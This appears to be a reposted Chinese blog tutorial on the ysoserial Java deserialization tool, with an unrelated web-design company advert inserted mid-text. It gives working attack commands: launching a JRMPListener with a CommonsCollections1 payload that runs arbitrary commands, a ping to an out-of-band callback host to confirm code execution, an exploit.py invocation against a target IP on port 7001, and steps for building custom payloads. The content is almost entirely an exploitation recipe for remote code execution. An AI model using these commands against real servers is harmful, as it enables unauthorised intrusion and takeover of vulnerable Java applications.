反序列化工具ysoserial使用介绍
反序列化工具ysoserial使用介绍
0x00 ysoserial是什么?
ysoserial集合了各种java反序列化payload;
下载地址:https://github.com/angelwhu/ysoserial
创新互联自成立以来,一直致力于为企业提供从网站策划、网站设计、成都网站制作、成都网站设计、电子商务、网站推广、网站优化到为企业提供个性化软件开发等基于互联网的全面整合营销服务。公司拥有丰富的网站建设和互联网应用系统开发管理经验、成熟的应用系统解决方案、优秀的网站开发工程师团队及专业的网站设计师团队。
0x01 基本使用方法
在公网vps上执行:
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 【port】 CommonsCollections1 '【commands】'
port:公网vps上监听的端口号
commands:需要执行的命令
例子:
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 2 rce.267hqw.ceye.io'
重启一个shell窗口:
python exploit.py 【目标ip】 【目标端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】 【JRMPListener port】 JRMPClient
列子:
python exploit.py 118.89.53.139 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 118.89.53.139 1099 JRMPClient
0x02 在ysoserial编写自己的payload
- git clone https://github.com/fanyingjie2/ysoserial.git
- 将自己编写的payload放在下载的包中:路径ysoserial/src/main/java/ysoserial/payloads/
- 修改Dockerfile
- docker build -t ysoserial .
- docker run -ti ID号 /bin/bash
- 在docke中执行 apt-get update
- 在docker中执行apt-get install lrzsz
- sz target/ysoserial.jar
当前文章:反序列化工具ysoserial使用介绍
地址分享:http://azwzsj.com/article/gjchhs.html